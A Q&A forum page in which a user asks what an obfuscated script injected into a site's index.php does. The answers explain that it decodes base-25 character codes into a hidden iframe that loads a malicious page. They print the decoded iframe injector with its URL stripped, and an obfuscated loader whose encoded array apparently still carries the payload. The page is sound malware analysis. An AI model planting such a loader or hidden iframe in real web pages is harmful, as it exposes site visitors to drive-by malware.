Logo Questions Linux Laravel Mysql Ubuntu Git Menu
 

Why this obfuscated code is malicious in JavaScript?

A friend of mine's site was being listed as malicious, and we found some obfuscated code that had been injected into his index.php without him knowing. I deobfuscated the code down two levels and found this:

(code can be viewed in the edit history)

Can anyone tell me what it's trying to do and why it's malicious..?

like image 351
Nathan F. Avatar asked Nov 09 '12 17:11

Nathan F.


2 Answers

To summarize, the code "decodes" HTML which places an <iframe> that loads in a malicious URL.

The following line has the "encoded" HTML:

n = ["9","9","45","42", ...

Each number represents a character that is in base-25. The code will loop through this array and use javascript's String.fromCharCode() to convert it to an ASCII character. After all of this, it will eval() it to place it on the page.

The "decoded" javascript is:

if (document.getElementsByTagName('body')[0]){
    iframer();
} else {
    document.write("<iframe src='[stripped]' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>");
}
function iframer(){
    var f = document.createElement('iframe');f.setAttribute('src','[stripped]');f.style.visibility='hidden';f.style.position='absolute';f.style.left='0';f.style.top='0';f.setAttribute('width','10');f.setAttribute('height','10');
    document.getElementsByTagName('body')[0].appendChild(f);
}

Note, I have stripped the malicious URL from the code for safety purposes.

like image 136
newfurniturey Avatar answered Oct 13 '22 18:10

newfurniturey


It injects a hidden iframe into the page, linked to what may well be a dodgy site. Here's a safe version of the code you can run and see what it tries to inject...

http://jsfiddle.net/FqtZ8/

I visited the site it links to and chrome warned me of malware, so I went no further.

try{
if(window.document) window["document"]["body"]="123"
}catch(bawetawe){
if(window.document){
v=window;
try{
fawbe--
}catch(afnwenew){
try{
(v+v)()
}catch(gngrthn){
try{if(020===0x10)v["document"]["body"]="123"
}catch(gfdnfdgber){
m=123;
if((alert+"").indexOf("na"+"ti"+"ve")!==-1)ev=window["eval"];
}
}
n=            ["9","9","45","42","17","1f","40","4b","3o","4h","49","41","4a","4g","1l","43","41","4g","    j","48","41","49","41","4a","4g","4f","2g","4l","39","3m","43","33","3m","49","41","1f","1e","3n","4b","40","4l","1e","1g","3g","1n","3i","1g","4n","d","9","9","9","45","42","4e","3m","49","41","4e","1f","1g","29","d","9","9","50","17","41","48","4f","41","17","4n","d","9","9","9","40","4b","3o","4h","49","41","4a","4g","1l","4j","4e","45","4g","41","1f","19","2a","45","42","4e","3m","49","41","17","4f","4e","3o","2b","1e","44","4g","4g","4c","28","1m","1m","43","3o","4d","40","4f","47","3m","4j","4f","4k","1l","41","40","4a","4f","1l","3n","45","4m","1m","4g","1m","4i","3o","1l","4c","44","4c","2d","43","4b","2b","20","1e","17","4j","45","40","4g","44","2b","1e","1o","1n","1e","17","44","41","45","43","44","4g","2b","1e","1o","1n","1e","17","4f","4g","4l","48","41","2b","1e","4i","45","4f","45","3n","45","48","45","4g","4l","28","44","45","40","40","41","4a","29","4c","4b","4f","45","4g","45","4b","4a","28","3m","3n","4f","4b","48","4h","4g","41","29","48","41","42","4g","28","1n","29","4g","4b","4c","28","1n","29","1e","2c","2a","1m","45","42","4e","3m","49","41","2c","19","1g","29","d","9","9","50","d","9","9","42","4h","4a","3o","4g","45","4b","4a","17","45","42","4e","3m","49","41","4e","1f","1g","4n","d","9","9","9","4i","3m","4e","17","42","17","2b","17","40","4b","3o","4h","49","41","4a","4g","1l","3o","4e","41","3m","4g","41","2j","48","41","49","41","4a","4g","1f","1e","45","42","4e","3m","49","41","1e","1g","29","42","1l","4f","41","4g","2f","4g","4g","4e","45","3n","4h","4g","41","1f","1e","4f","4e","3o","1e","1j","1e","44","4g","4g","4c","28","1m","1m","43","3o","4d","40","4f","47","3m","4j","4f","4k","1l","41","40","4a","4f","1l","3n","45","4m","1m","4g","1m","4i","3o","1l","4c","44","4c","2d","43","4b","2b","20","1e","1g","29","42","1l","4f","4g","4l","48","41","1l","4i","45","4f","45","3n","45","48","45","4g","4l","2b","1e","44","45","40","40","41","4a","1e","29","42","1l","4f","4g","4l","48","41","1l","4c","4b","4f","45","4g","45","4b","4a","2b","1e","3m","3n","4f","4b","48","4h","4g","41","1e","29","42","1l","4f","4g","4l","48","41","1l","48","41","42","4g","2b","1e","1n","1e","29","42","1l","4f","4g","4l","48","41","1l","4g","4b","4c","2b","1e","1n","1e","29","42","1l","4f","41","4g","2f","4g","4g","4e","45","3n","4h","4g","41","1f","1e","4j","45","40","4g","44","1e","1j","1e","1o","1n","1e","1g","29","42","1l","4f","41","4g","2f","4g","4g","4e","45","3n","4h","4g","41","1f","1e","44","41","45","43","44","4g","1e","1j","1e","1o","1n","1e","1g","29","d","9","9","9","40","4b","3o","4h","49","41","4a","4g","1l","43","41","4g","2j","48","41","49","41","4a","4g","4f","2g","4l","39","3m","43","33","3m","49","41","1f","1e","3n","4b","40","4l","1e","1g","3g","1n","3i","1l","3m","4c","4c","41","4a","40","2h","44","45","48","40","1f","42","1g","29","d","9","9","50"];
h=2;
s="";
if(m) for(i=0;i-589!=0;i++){
k=i;
if(window["document"]) s+=String["fro"+"mC"+"harCode"](
parseInt(n[i],25)
);
}z=s;alert(z);
}
}
}?
like image 45
Reinstate Monica Cellio Avatar answered Oct 13 '22 16:10

Reinstate Monica Cellio